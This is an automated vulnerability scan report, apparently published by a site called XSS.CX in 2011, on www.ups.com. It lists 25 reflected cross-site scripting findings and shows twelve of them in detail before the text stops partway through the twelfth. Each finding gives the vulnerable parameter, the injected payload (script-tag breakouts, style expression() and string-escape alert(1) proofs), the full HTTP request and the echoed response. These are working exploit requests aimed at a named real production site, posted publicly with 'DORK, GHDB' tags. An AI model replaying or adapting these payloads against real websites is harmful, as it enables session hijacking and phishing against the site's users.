XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, www.ups.com

Report generated by XSS.CX at Sat Aug 20 07:12:49 GMT-06:00 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. Cross-site scripting (reflected)

XSS in ups.com, XSS, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86

1.1. http://www.ups.com/bussol [WT.svl parameter]

1.2. http://www.ups.com/bussol [contentID parameter]

1.3. http://www.ups.com/bussol [contentID parameter]

1.4. http://www.ups.com/bussol [loc parameter]

1.5. http://www.ups.com/bussol [loc parameter]

1.6. http://www.ups.com/bussol [name of an arbitrarily supplied request parameter]

1.7. http://www.ups.com/bussol [name of an arbitrarily supplied request parameter]

1.8. http://www.ups.com/bussol [viewID parameter]

1.9. http://www.ups.com/bussol [viewID parameter]

1.10. http://www.ups.com/dropoff [WBPM_lid parameter]

1.11. http://www.ups.com/dropoff [appid parameter]

1.12. http://www.ups.com/dropoff [formAction parameter]

1.13. http://www.ups.com/dropoff [loc parameter]

1.14. http://www.ups.com/dropoff [loc parameter]

1.15. http://www.ups.com/dropoff [localeCountry parameter]

1.16. http://www.ups.com/dropoff [name of an arbitrarily supplied request parameter]

1.17. http://www.ups.com/dropoff [originCity parameter]

1.18. http://www.ups.com/dropoff [originCityHist parameter]

1.19. http://www.ups.com/dropoff [originCountry parameter]

1.20. http://www.ups.com/dropoff [originPostal parameter]

1.21. http://www.ups.com/dropoff [originPostalHist parameter]

1.22. http://www.ups.com/dropoff [originState parameter]

1.23. http://www.ups.com/dropoff [originStateHist parameter]

1.24. http://www.ups.com/dropoff [originStreet parameter]

1.25. http://www.ups.com/dropoff [userState parameter]

2. Flash cross-domain policy

3. Cross-domain Referer leakage

3.1. http://www.ups.com/bussol

3.2. http://www.ups.com/content/us/en/index.jsx

3.3. http://www.ups.com/dropoff

4. Cookie without HttpOnly flag set

5. Private IP addresses disclosed

6. Robots.txt file

7. HTML does not specify charset

8. Content type incorrectly stated



1. Cross-site scripting (reflected)  next
There are 25 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.ups.com/bussol [WT.svl parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The value of the WT.svl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26423"style%3d"x%3aexpression(alert(1))"812e8affcde was submitted in the WT.svl parameter. This input was echoed as 26423"style="x:expression(alert(1))"812e8affcde in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bussol?loc=a%22%20onmouseup=%22javascript:document.title=1313844824642004;&viewID=categoryView&contentID=ct1_sol_cat_wireless&WT.svl=BnrMsg26423"style%3d"x%3aexpression(alert(1))"812e8affcde HTTP/1.1
Host: www.ups.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 13:05:42 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 18175


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<meta name="DCSext.pgf_Site" content="Country">
<meta name="DCSext.pCC" content="US">
<meta name="DCSex
...[SNIP]...
<input type="hidden" id="unKnown"
   value="&viewID=categoryView&WT.svl=BnrMsg26423"style="x:expression(alert(1))"812e8affcde&contentID=ct1_sol_cat_wireless&loc=a" onmouseup="javascript:document.title=1313844824642004;" />
...[SNIP]...

1.2. http://www.ups.com/bussol [contentID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The value of the contentID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5671e"style%3d"x%3aexpression(alert(1))"448b2d12e4d was submitted in the contentID parameter. This input was echoed as 5671e"style="x:expression(alert(1))"448b2d12e4d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bussol?loc=a%22%20onmouseup=%22javascript:document.title=1313844824642004;&viewID=categoryView&contentID=ct1_sol_cat_wireless5671e"style%3d"x%3aexpression(alert(1))"448b2d12e4d&WT.svl=BnrMsg HTTP/1.1
Host: www.ups.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 13:05:35 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 18269


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<meta name="DCSext.pgf_Site" content="Country">
<meta name="DCSext.pCC" content="US">
<meta name="DCSex
...[SNIP]...
<input type="hidden" id="bspa_contentID"
   value="ct1_sol_cat_wireless5671e"style="x:expression(alert(1))"448b2d12e4d" />
...[SNIP]...

1.3. http://www.ups.com/bussol [contentID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The value of the contentID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efbc4"%3balert(1)//93fbe178aa8 was submitted in the contentID parameter. This input was echoed as efbc4";alert(1)//93fbe178aa8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bussol?loc=a%22%20onmouseup=%22javascript:document.title=1313844824642004;&viewID=categoryView&contentID=ct1_sol_cat_wirelessefbc4"%3balert(1)//93fbe178aa8&WT.svl=BnrMsg HTTP/1.1
Host: www.ups.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 13:05:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 18212


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<meta name="DCSext.pgf_Site" content="Country">
<meta name="DCSext.pCC" content="US">
<meta name="DCSex
...[SNIP]...
omain",
           "type", "application/x-shockwave-flash",
           "pluginspage", "http://www.adobe.com/go/getflashplayer",
           "FlashVars", "bspa_xmlRoot=/xml/ria/na/us/en/bussol/&contentID=ct1_sol_cat_wirelessefbc4";alert(1)//93fbe178aa8&hash=1313845536075&loc=a" onmouseup="javascript:document.title=1313844824642004;&v=2.0.4&viewID=categoryView"
   );
} else { // flash is too old or we can't detect the plugin
   document.getElementByI
...[SNIP]...

1.4. http://www.ups.com/bussol [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62a59"style%3d"x%3aexpression(alert(1))"8a16ce3099f was submitted in the loc parameter. This input was echoed as 62a59"style="x:expression(alert(1))"8a16ce3099f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bussol?loc=a%22%20onmouseup=%22javascript:document.title=1313844824642004;62a59"style%3d"x%3aexpression(alert(1))"8a16ce3099f&viewID=categoryView&contentID=ct1_sol_cat_wireless&WT.svl=BnrMsg HTTP/1.1
Host: www.ups.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 13:05:22 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 18222


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<meta name="DCSext.pgf_Site" content="Country">
<meta name="DCSext.pCC" content="US">
<meta name="DCSex
...[SNIP]...
<input type="hidden" id="unKnown"
   value="&viewID=categoryView&WT.svl=BnrMsg&contentID=ct1_sol_cat_wireless&loc=a" onmouseup="javascript:document.title=1313844824642004;62a59"style="x:expression(alert(1))"8a16ce3099f" />
...[SNIP]...

1.5. http://www.ups.com/bussol [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c369b"%3balert(1)//e812e01b8f4 was submitted in the loc parameter. This input was echoed as c369b";alert(1)//e812e01b8f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bussol?loc=a%22%20onmouseup=%22javascript:document.title=1313844824642004;c369b"%3balert(1)//e812e01b8f4&viewID=categoryView&contentID=ct1_sol_cat_wireless&WT.svl=BnrMsg HTTP/1.1
Host: www.ups.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 13:05:23 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=cGWNTPxTxrNdcvRhbpfJSgRPv1xXh7LL2QvDxWJTcCsdPpm3LzQ3!1612118992!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 18184


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<meta name="DCSext.pgf_Site" content="Country">
<meta name="DCSext.pCC" content="US">
<meta name="DCSex
...[SNIP]...
ww.adobe.com/go/getflashplayer",
           "FlashVars", "bspa_xmlRoot=/xml/ria/na/us/en/bussol/&contentID=ct1_sol_cat_wireless&hash=1313845523748&loc=a" onmouseup="javascript:document.title=1313844824642004;c369b";alert(1)//e812e01b8f4&v=2.0.4&viewID=categoryView"
   );
} else { // flash is too old or we can't detect the plugin
   document.getElementById("noflashdiv").style.display = "block";
}
</script>
...[SNIP]...

1.6. http://www.ups.com/bussol [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ced8"%3balert(1)//986c59428fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6ced8";alert(1)//986c59428fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bussol?loc=a%22%20onmouseup=%22javascript:document.title=1313844824642004;&viewID=categoryView&contentID=ct1_sol_cat_wireless&WT.svl=BnrMsg&6ced8"%3balert(1)//986c59428fb=1 HTTP/1.1
Host: www.ups.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 13:05:49 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 18190


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<meta name="DCSext.pgf_Site" content="Country">
<meta name="DCSext.pCC" content="US">
<meta name="DCSex
...[SNIP]...
lor", "#869ca7",
           "name", "bussol",
           "allowScriptAccess","sameDomain",
           "type", "application/x-shockwave-flash",
           "pluginspage", "http://www.adobe.com/go/getflashplayer",
           "FlashVars", "6ced8";alert(1)//986c59428fb=1&bspa_xmlRoot=/xml/ria/na/us/en/bussol/&contentID=ct1_sol_cat_wireless&hash=1313845549480&loc=a" onmouseup="javascript:document.title=1313844824642004;&v=2.0.4&viewID=categoryView"
   );
} else { //
...[SNIP]...

1.7. http://www.ups.com/bussol [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24664"><script>alert(1)</script>e20cbfc6036 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bussol?loc=a%22%20onmouseup=%22javascript:document.title=1313844824642004;&viewID=categoryView&contentID=ct1_sol_cat_wireless&WT.svl=BnrMsg&24664"><script>alert(1)</script>e20cbfc6036=1 HTTP/1.1
Host: www.ups.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 13:05:48 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=0Q7gTPxMJTKl1FnSXDrRqHzlT4p7jlNW9Y7jB4fKsQqdQLvTvhLv!1612118992!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 18220


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<meta name="DCSext.pgf_Site" content="Country">
<meta name="DCSext.pCC" content="US">
<meta name="DCSex
...[SNIP]...
<input type="hidden" id="unKnown"
   value="&viewID=categoryView&24664"><script>alert(1)</script>e20cbfc6036=1&WT.svl=BnrMsg&contentID=ct1_sol_cat_wireless&loc=a" onmouseup="javascript:document.title=1313844824642004;" />
...[SNIP]...

1.8. http://www.ups.com/bussol [viewID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The value of the viewID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d618"%3balert(1)//7a84aaccae4 was submitted in the viewID parameter. This input was echoed as 2d618";alert(1)//7a84aaccae4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bussol?loc=a%22%20onmouseup=%22javascript:document.title=1313844824642004;&viewID=categoryView2d618"%3balert(1)//7a84aaccae4&contentID=ct1_sol_cat_wireless&WT.svl=BnrMsg HTTP/1.1
Host: www.ups.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 13:05:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 18212


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<meta name="DCSext.pgf_Site" content="Country">
<meta name="DCSext.pCC" content="US">
<meta name="DCSex
...[SNIP]...
er",
           "FlashVars", "bspa_xmlRoot=/xml/ria/na/us/en/bussol/&contentID=ct1_sol_cat_wireless&hash=1313845528260&loc=a" onmouseup="javascript:document.title=1313844824642004;&v=2.0.4&viewID=categoryView2d618";alert(1)//7a84aaccae4"
   );
} else { // flash is too old or we can't detect the plugin
   document.getElementById("noflashdiv").style.display = "block";
}
</script>
...[SNIP]...

1.9. http://www.ups.com/bussol [viewID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The value of the viewID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65a4a"style%3d"x%3aexpression(alert(1))"c1a3a31697b was submitted in the viewID parameter. This input was echoed as 65a4a"style="x:expression(alert(1))"c1a3a31697b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bussol?loc=a%22%20onmouseup=%22javascript:document.title=1313844824642004;&viewID=categoryView65a4a"style%3d"x%3aexpression(alert(1))"c1a3a31697b&contentID=ct1_sol_cat_wireless&WT.svl=BnrMsg HTTP/1.1
Host: www.ups.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 13:05:27 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=bBp7TPxXTGnyyRVpRZwZnG3Tyv3l20vCzjnPSp4Hh5h3KvrhqVLT!1812614967!-1727860139!15202!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 18269


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<meta name="DCSext.pgf_Site" content="Country">
<meta name="DCSext.pCC" content="US">
<meta name="DCSex
...[SNIP]...
<input type="hidden" id="bspa_viewID"
   value="categoryView65a4a"style="x:expression(alert(1))"c1a3a31697b" />
...[SNIP]...

1.10. http://www.ups.com/dropoff [WBPM_lid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /dropoff

Issue detail

The value of the WBPM_lid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc441"><script>alert(1)</script>ce2b72fb400 was submitted in the WBPM_lid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dropoff?loc=a%22%20onmouseup=%22javascript:document.title=1313844889729173;&localeCountry=US&WBPM_lid=cc441"><script>alert(1)</script>ce2b72fb400&appid=dollaunch&userState=1&formAction=http%253A%252F%252Fwww.ups.com%252Fdropoff&originStreet=1&originCity=1&originPostal=1&originCityHist=&originStateHist=&originPostalHist=&originCountry=US&originState= HTTP/1.1
Host: www.ups.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; com.ups.bussol.data=vf23TPwPgYctTkKVdZRxs0KK2Q72Qj2QYGN1TX8lJQlpnp6whWtw!1612118992!-1727860140!15201!-1

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 13:09:24 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 28222


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<meta name="DCSext.pgf_Site" content="Country">
<meta name="DCSext.pCC" content="US">
<meta name="DCSex
...[SNIP]...
<IFRAME style="height: 1200px;" src="http://maps.ups.com/UPSGlobalLocator/Search/?WBPM_lid=cc441"><script>alert(1)</script>ce2b72fb400&originPostal=1&appid=dollaunch&localeCountry=US&country=US&originStreet=1&originCity=1&originPostalHist=&originCityHist=&originState=&userState=1&originStateHist=&formAction=http%3A%2F%2Fwww.ups.com%2
...[SNIP]...

1.11. http://www.ups.com/dropoff [appid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /dropoff

Issue detail

The value of the appid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4e9e"><script>alert(1)</script>162a845474c was submitted in the appid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dropoff?loc=a%22%20onmouseup=%22javascript:document.title=1313844889729173;&localeCountry=US&WBPM_lid=homepage%252Fct1.html_pnl_loc&appid=b4e9e"><script>alert(1)</script>162a845474c&userState=1&formAction=http%253A%252F%252Fwww.ups.com%252Fdropoff&originStreet=1&originCity=1&originPostal=1&originCityHist=&originStateHist=&originPostalHist=&originCountry=US&originState= HTTP/1.1
Host: www.ups.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; com.ups.bussol.data=vf23TPwPgYctTkKVdZRxs0KK2Q72Qj2QYGN1TX8lJQlpnp6whWtw!1612118992!-1727860140!15201!-1

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 13:09:28 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 28240


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<meta name="DCSext.pgf_Site" content="Country">
<meta name="DCSext.pCC" content="US">
<meta name="DCSex
...[SNIP]...
<IFRAME style="height: 1200px;" src="http://maps.ups.com/UPSGlobalLocator/Search/?WBPM_lid=homepage%2Fct1.html_pnl_loc&originPostal=1&appid=b4e9e"><script>alert(1)</script>162a845474c&localeCountry=US&country=US&originStreet=1&originCity=1&originPostalHist=&originCityHist=&originState=&userState=1&originStateHist=&formAction=http%3A%2F%2Fwww.ups.com%2Fdropoff&loc=a" onmouseup="java
...[SNIP]...

1.12. http://www.ups.com/dropoff [formAction parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /dropoff

Issue detail

The value of the formAction request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8eddc"><script>alert(1)</script>8e684956a59 was submitted in the formAction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dropoff?loc=a%22%20onmouseup=%22javascript:document.title=1313844889729173;&localeCountry=US&WBPM_lid=homepage%252Fct1.html_pnl_loc&appid=dollaunch&userState=1&formAction=8eddc"><script>alert(1)</script>8e684956a59&originStreet=1&originCity=1&originPostal=1&originCityHist=&originStateHist=&originPostalHist=&originCountry=US&originState= HTTP/1.1
Host: www.ups.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; com.ups.bussol.data=vf23TPwPgYctTkKVdZRxs0KK2Q72Qj2QYGN1TX8lJQlpnp6whWtw!1612118992!-1727860140!15201!-1

Response

HTTP/1.1 200 OK
Date: Sat, 20 Aug 2011 13:09:39 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 28215


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<meta name="DCSext.pgf_Site" content="Country">
<meta name="DCSext.pCC" content="US">
<meta name="DCSex
...[SNIP]...
